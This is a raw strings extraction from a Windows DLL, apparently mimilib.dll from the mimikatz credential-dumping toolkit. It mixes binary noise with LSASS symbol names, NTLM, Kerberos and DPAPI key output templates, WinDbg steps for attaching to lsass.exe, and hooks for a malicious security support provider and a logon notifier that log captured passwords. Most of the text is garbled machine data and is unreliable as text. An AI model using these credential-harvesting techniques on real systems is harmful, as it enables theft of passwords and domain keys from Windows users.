!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
|$TRUUU
A_A^A]A\_
SUVWATAUAVAWH
9\$,vPH
A_A^A]A\_^][
tJHcL;
UAVAWH
WAVAWH
WAVAWH
A_A^_
WAVAWH
H WAVAWH
PA_A^_
UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
}P9 vs
0t>fD9=
HcO E3
HcO$E3
@A_A^A]A\_^]
|$ UATAVH
UVWATAUAVAWH
PA_A^A]A\_^]
H SVWH
D$DDtRH
@USVWATAUAVAWH
t'HcG<
H;|80u
xA_A^A]A\_^[]
|$ AVH
H3E H3E
WATAUAVAWH
A_A^A]A\_
t<ffff
WATAUAVAWH
A_A^A]A\_
fffffff
|$ AVH
WAVAWH
@A_A^_
D$0H;G
t$ WATAUAVAWH
s4+sP+
A_A^A]A\_
t$ WAVAWH
A_A^_
u3HcH<H
x ATAVAWH
A_A^A\
UVWAVAWH
0A_A^_^]
WAVAWH
A86taH
0A_A^_
L$ WATAUAVAWH
@A_A^A]A\_
t$ WATAUAVAWH
'D8l$@
t)D8l$@t
WD8l$@t
D8l$@t
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
\$ UVWATAUAVAWH
H!D$ E
`A_A^A]A\_^]
D82u&H
D8t$Ht
x ATAVAWH
gfffffffH
D8d$ht
A_A^A\
WATAUAVAWH
A_A^A]A\_
I9\$ ~@H
fD9t$b
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
`A_A^A]A\_^]
x ATAVAWH
0A_A^A\
\$ UVWAVAWH
A_A^_^]
@8|$^t
l$ VWATAVAWH
L$&@8t$&t0@8q
A81t@@8r
A_A^A\_^
fD94Fu
SVWATAUAWH
HA_A]A\_^[
ATAVAWH
0A_A^A\
D8t$8t
s WAVAWH
0A_A^_
UATAUAVAWH
A_A^A]A\]
@UATAUAVAWH
H!T$0D
uf!T$(H!T$
A_A^A]A\]
@UATAUAVAWH
e0A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
@USVWATAUAVAWH
D8l$ht
A_A^A]A\_^[]
l$ WAVAWH
A_A^_
@UATAVH
WAVAWH
A_A^_
@SUVWATAUAVAWH
D88Hte
8A_A^A]A\_^][
SUVWATAUAVAWH
D88Ht!
D98Ht;H
8A_A^A]A\_^][
UVWATAUAVAWH
D(8Ht}
`A_A^A]A\_^]
ffffff
fffffff
|$ ATAVAWH
\$@@8=-
A_A^A\
USVWAVH
A^_^[]
LcA<E3
u HcA<H
bcrypt.dll
AcquireSRWLockExclusive
ReleaseSRWLockExclusive
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
`h````
xpxxxx
(null)
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
GetCurrentPackageId
InitializeCriticalSectionEx
LCMapStringEx
LocaleNameToLCID
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM >cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
DhcpServerCalloutEntry
CredUnPackAuthenticationBufferW
CredIsProtectedW
CredUnprotectW
Primary
CredentialKeys
[%08x] %Z
n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)
n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)
* Key List
[%08x]
[%08x]
* GUID :
* Time :
* MasterKey :
0x%02x,
\x%02x
null
des_plain
des_cbc_crc
des_cbc_md4
des_cbc_md5
des_cbc_md5_nt
rc4_plain
rc4_plain2
rc4_plain_exp
rc4_lm
rc4_md4
rc4_sha
rc4_hmac_nt
rc4_hmac_nt_exp
rc4_plain_old
rc4_plain_old_exp
rc4_hmac_old
rc4_hmac_old_exp
aes128_hmac_plain
aes256_hmac_plain
aes128_hmac
aes256_hmac
unknow
[ERROR] [RPC Decode] Exception 0x%08x: (%u)
[ERROR] [RPC Decode] MesIncrementalHandleReset: %08x
[ERROR] [RPC Decode] MesDecodeIncrementalHandleCreate: %08x
[ERROR] [RPC Free] Exception 0x%08x: (%u)
[ERROR] [RPC Free] MesDecodeIncrementalHandleCreate: %08x
.#####. mimikatz 2.2.0 (x64) built on Jul 29 2024 23:16:51
.## ^ ##. "A La Vie, A L'Amour" - Windows build %hu
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
UndefinedLogonType
Unknown !
Interactive
Network
Service
Unlock
NetworkCleartext
NewCredentials
RemoteInteractive
CachedInteractive
CachedRemoteInteractive
CachedUnlock
tspkg!TSGlobalCredTable
wdigest
wdigest!l_LogSessList
livessp
livessp!LiveGlobalLogonSessionList
kerberos
kerberos!KerbGlobalLogonSessionTable
msv1_0!SspCredentialList
masterkey
lsasrv!g_MasterKeyCacheList
dpapisrv!g_MasterKeyCacheList
credman
( (
) )
.______.
| |]
\ /
`----'
lsasrv!LogonSessionLeakList
lsasrv!InitializationVector
lsasrv!hAesKey
lsasrv!h3DesKey
lsasrv!LogonSessionList
lsasrv!LogonSessionListCount
kdcsvc!SecData
krbtgt keys
===========
Current
Previous
kdcsvc!KdcDomainList
Domain List
===========
SekurLSA
========
Authentication Id : %u ; %u (%08x:%08x)
Session : %s from %u
User Name : %wZ
Domain : %wZ
Logon Server : %wZ
Logon Time :
SID :
[ERROR] [LSA] Symbols
%p - lsasrv!LogonSessionListCount
%p - lsasrv!LogonSessionList
[ERROR] [CRYPTO] Acquire keys
[ERROR] [CRYPTO] Symbols
%p - lsasrv!InitializationVector
%p - lsasrv!hAesKey
%p - lsasrv!h3DesKey
[ERROR] [CRYPTO] Init
* Username : %wZ
* Domain : %wZ
* LM :
* NTLM :
* SHA1 :
* DPAPI :
* Raw data :
* Smartcard
PIN code : %wZ
Model : %S
Reader : %S
Key name : %S
Provider : %S
%s
<no size, buffer is incorrect>
Unknown version in Kerberos credentials structure
* Username : %wZ
* Domain : %wZ
* Password :
LUID KO
* RootKey :
* %08x :
* LSA Isolated Data: %.*s
Unk-Key :
Encrypted:
SS:%u, TS:%u, DS:%u
0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:
, 5:0x%x
* unkData1 :
unkData2 :
%s krbtgt:
%u credentials
* %s :
[%s]
-> %wZ
%wZ ->
from:
* %s :
Domain: %wZ (%wZ
* RSA key
PVK (private key)
DER (public key and certificate)
* Legacy key
* Unknown key (seen as %08x)
lsasrv!g_guidPreferredKey
lsasrv!g_pbPreferredKey
lsasrv!g_cbPreferredKey
lsasrv!g_guidW2KPreferredKey
lsasrv!g_pbW2KPreferredKey
lsasrv!g_cbW2KPreferredKey
lsasrv!g_fSystemCredsInitialized
lsasrv!g_rgbSystemCredMachine
lsasrv!g_rgbSystemCredUser
dpapisrv!g_guidPreferredKey
dpapisrv!g_pbPreferredKey
dpapisrv!g_cbPreferredKey
dpapisrv!g_guidW2KPreferredKey
dpapisrv!g_pbW2KPreferredKey
dpapisrv!g_cbW2KPreferredKey
dpapisrv!g_fSystemCredsInitialized
dpapisrv!g_rgbSystemCredMachine
dpapisrv!g_rgbSystemCredUser
DPAPI Backup keys
=================
Current prefered key:
Compatibility prefered key:
DPAPI System
============
full:
m/u :
bcrypt.dll
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCZ
.CRT$XIA
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.didat$5
.pdata
.rsrc$01
.rsrc$02
BCryptDestroyKey
BCryptGetProperty
BCryptDecrypt
BCryptOpenAlgorithmProvider
BCryptCloseAlgorithmProvider
BCryptSetProperty
BCryptGenerateSymmetricKey
mimilib.dll
DhcpNewPktHook
DhcpServerCalloutEntry
DllCanUnloadNow
DllGetClassObject
DnsPluginCleanup
DnsPluginInitialize
DnsPluginQuery
ExtensionApiVersion
InitializeChangeNotify
Msv1_0SubAuthenticationFilter
Msv1_0SubAuthenticationRoutine
NPGetCaps
NPLogonNotify
PasswordChangeNotify
SpLsaModeInitialize
WinDbgExtensionDllInit
coffee
mimikatz
startW
CreateProcessAsUserW
CreateRestrictedToken
OpenProcessToken
ConvertSidToStringSidA
IsTextUnicode
ADVAPI32.dll
RtlEqualString
RtlFreeUnicodeString
RtlStringFromGUID
ntdll.dll
MesHandleFree
MesDecodeIncrementalHandleCreate
MesIncrementalHandleReset
NdrMesTypeDecode2
NdrMesTypeFree2
RPCRT4.dll
CoCreateInstance
ole32.dll
GetCurrentProcess
CloseHandle
lstrlenW
LoadLibraryW
GetProcAddress
FreeLibrary
VirtualProtect
GetLastError
LocalAlloc
LocalFree
GetTimeFormatA
FileTimeToSystemTime
GetDateFormatA
FileTimeToLocalFileTime
RaiseException
GetSystemInfo
VirtualQuery
GetModuleHandleW
LoadLibraryExA
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
IsProcessorFeaturePresent
KERNEL32.dll
RtlUnwindEx
InterlockedFlushSList
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
LoadLibraryExW
ExitProcess
TerminateProcess
GetModuleHandleExW
GetModuleFileNameA
MultiByteToWideChar
WideCharToMultiByte
HeapFree
HeapAlloc
GetACP
FlushFileBuffers
WriteFile
GetConsoleCP
GetConsoleMode
GetStdHandle
GetFileType
LCMapStringW
FindClose
FindFirstFileExA
FindNextFileA
IsValidCodePage
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetProcessHeap
GetStringTypeW
SetStdHandle
CreateFileW
SetFilePointerEx
WriteConsoleW
HeapSize
HeapReAlloc
SetEndOfFile
ReadFile
ReadConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
KERNEL32.DLL
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
ext-ms-
(null)
mscoree.dll
UTF-16LEUNICODE
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
api-ms-win-appmodel-runtime-l1-1-1
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-file-l2-1-1
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-synch-l1-2-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-kernel32-package-current-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernel32
user32
((((( H
((((( H
(
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
kiwidns.log
%S (%hu)
kiwifilter.log
[%08x] %wZ
kiwinp.log
[%08x:%08x] %s %wZ\%wZ
KiwiSSP
Kiwi Security Support Provider
kiwissp.log
[%08x:%08x] [%08x] %wZ\%wZ (%wZ)
kiwisub.log
%u (%u) - %wZ\%wZ (%wZ) (%hu)
kcredentialprovider.log
Credui.dll
advapi32.dll
ChainingModeCBC
ChainingMode
ObjectLength
ChainingModeCFB
(null)
%02x%s
VS_VERSION_INFO
StringFileInfo
040904b0
ProductName
mimilib (mimikatz)
ProductVersion
2.2.0.0
CompanyName
gentilkiwi (Benjamin DELPY)
FileDescription
mimilib for Windows (mimikatz)
FileVersion
2.2.0.0
InternalName
mimilib
LegalCopyright
Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)
OriginalFilename
mimilib.dll
PrivateBuild
Build with love for POC only
SpecialBuild
VarFileInfo
Translation